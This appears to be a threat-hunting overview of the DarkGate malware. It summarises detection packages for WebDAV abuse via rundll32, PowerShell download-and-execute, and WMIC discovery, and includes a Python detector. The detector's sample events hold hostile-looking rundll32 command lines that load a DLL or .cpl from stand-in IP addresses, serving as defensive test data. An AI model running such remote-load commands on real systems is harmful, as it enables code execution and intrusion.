Threat Overview - DarkGate Malware
The DarkGate malware variant was first observed in the wild in 2018 (seemingly in production since 2017) and has evolved into a more dangerous and widespread version of itself in recent years; notably, after the takedown of the Qbot infrastructure there was a surge in cases involving it. DarkGate is a malicious toolkit operated under the Malware-as-a-Service model (it is sold or rented to threat actors) and is understood to provide the functionality of both a loader and a RAT (Remote Access Trojan).
Hunt Packages
Direct to IP Address in Execution of WebDav DLL via Rundll32 - Malicious Link or Exploitation
This Hunt Package focuses on identifying attempts by attackers to coax Microsoft applications, LOLBins or similar applications into using WebDAV to communicate over HTTP with attacker-controlled infrastructure. In recent reports, attackers have exclusively used direct-to-IP addresses for their WebDAV endpoints. As such, the provided query syntax looks for an IP address structured like a UNC path within the command line of a rundll32 execution that creates a WebDAV session. This activity has been observed in the exploitation of several vulnerabilities, such as CVE-2023-23397, CVE-2023-36025 and CVE-2024-21412. Web Distributed Authoring and Versioning (WebDAV) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In typical use, WebDAV provides a convenient means for file sharing and collaboration. Adversaries can abuse WebDAV to execute arbitrary code and perform other malicious activities, for example through specially crafted links in websites and phishing emails, or through Internet Shortcut files.
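A minimal form of the direct-to-IP check described above, run over constructed process-creation events (an added Python example, not the HUNTER package's own query; the davclnt.dll,DavSetCookie command-line shape, the WebDAV-style @port/@SSL UNC suffixes and all sample paths and addresses are assumptions):

```python
from __future__ import annotations
import re
from ipaddress import ip_address

# Constructed process-creation events for illustration (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 203.0.113.10 http://203.0.113.10/share/update.dll"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie files.example.internal http://files.example.internal/docs/q3.docx"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL \\192.0.2.7@80\DavWWWRoot\stage\x.cpl"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe \\192.0.2.7\share\notes.txt"},
]

# UNC host, tolerating WebDAV-style suffixes such as \\host@SSL@443\ or \\host@80\ (assumed forms).
UNC_HOST_RE = re.compile(r"\\\\([^\\@\s]+)(?:@(?:SSL|\d+))*\\", re.IGNORECASE)
# Host part of an http(s) URL passed on the command line (bracketed IPv6 allowed).
URL_HOST_RE = re.compile(r"https?://(\[[^\]]+\]|[^/\s:]+)", re.IGNORECASE)

def is_ip_literal(host: str) -> bool:
    """True when the host is a bare IPv4/IPv6 literal rather than a DNS name."""
    try:
        ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False

def webdav_ip_hosts(cmdline: str) -> list[str]:
    """IP-literal hosts referenced as UNC paths or http(s) URLs in a command line."""
    hosts = [m.group(1) for m in UNC_HOST_RE.finditer(cmdline)]
    hosts += [m.group(1) for m in URL_HOST_RE.finditer(cmdline)]
    return sorted({h for h in hosts if is_ip_literal(h)})

def is_suspicious(event: dict) -> bool:
    """Hunt hypothesis: rundll32 reaching a raw IP address via a UNC path or URL."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    return image == "rundll32.exe" and bool(webdav_ip_hosts(event["cmdline"]))

def hunt(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (cmdline, ip_hosts) for every event matching the hypothesis."""
    return [(e["cmdline"], webdav_ip_hosts(e["cmdline"])) for e in events if is_suspicious(e)]

if __name__ == "__main__":
    for cmdline, hosts in hunt(SAMPLE_EVENTS):
        print(f"HIT hosts={hosts}: {cmdline}")
```

The hostname-based WebDAV session (second event) and the non-rundll32 UNC access (fourth event) are deliberately left unflagged, matching the package's narrow direct-to-IP hypothesis.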
WMIC Windows Internal Discovery and Enumeration
This Hunt Package identifies potentially malicious use of WMI (Windows Management Instrumentation) for local enumeration and discovery on a host.
HTTP Request and Shell Execution Commands - Potential Download and Execute Command
PowerShell and the Windows command shell can be invoked from VBA code to download files and execute them, obscuring the activity and potentially bypassing security controls. The hypothesis for this Hunt Package identifies when cmd.exe or powershell.exe is used to perform a web request and the downloaded content is subsequently executed through the "Shell.Application" object in VBA. This technique was employed in the targeted attacks against Microsoft Teams users reported by TrueSec, which deployed the DarkGate malware.
Common Suspicious PowerShell Execution Argument Techniques
This Hunt Package is designed to identify suspicious PowerShell execution arguments in order to surface potentially malicious activity that deviates from standard practice within a specific environment. This can help the analyst discover abnormal or harmful events that leverage PowerShell for purposes such as launching attacks or maintaining persistence.
PowerShell Download and Execute Dropper Behavior - Separate Command Calls
This package identifies the use of PowerShell to pull down a payload and execute it. This is similar to activity observed in association with SysJoker's dropper for Windows, where the PowerShell commands are broken up into separate execution calls.
Windows cmd.exe Launching Script Interpreter
The intent of the provided query logic is to look for the execution of cscript.exe or wscript.exe processes whose parent is cmd.exe. Attackers often abuse these LOLBins to launch scripts and other malicious commands in an attempt to blend in with legitimate activity or bypass defenses.
Potentially Abnormal Parent Process for cmd.exe or regedit.exe
This use case identifies suspicious parent processes for cmd.exe and regedit.exe.
Abnormal Execution of WebDav DLL via Rundll32 - Potentially Malicious Link or Exploitation
This Hunt Package focuses on identifying attempts by attackers to coax Microsoft applications, LOLBins or similar applications into using WebDAV to communicate over HTTP with attacker-controlled infrastructure. In March 2023, Microsoft issued a patch for the vulnerability tracked as CVE-2023-23397, a critical elevation-of-privilege (EoP) vulnerability in Microsoft Outlook that is triggered when an attacker sends an appointment carrying an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server. In addition to SMB, it was found that other ports and services could be coerced, such as WebDAV over SSL (443) or HTTP (80). Web Distributed Authoring and Versioning (WebDAV) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In typical use, WebDAV provides a convenient means for file sharing and collaboration. Adversaries can abuse WebDAV to execute arbitrary code and perform other malicious activities. In this particular case, attackers may send malicious calendar invites or appointments that trigger the "reminder notification" sound for the proposed meeting or event. As a result, Outlook initiates a connection to the address configured in the "PidLidReminderFileParameter" MAPI field of the appointment.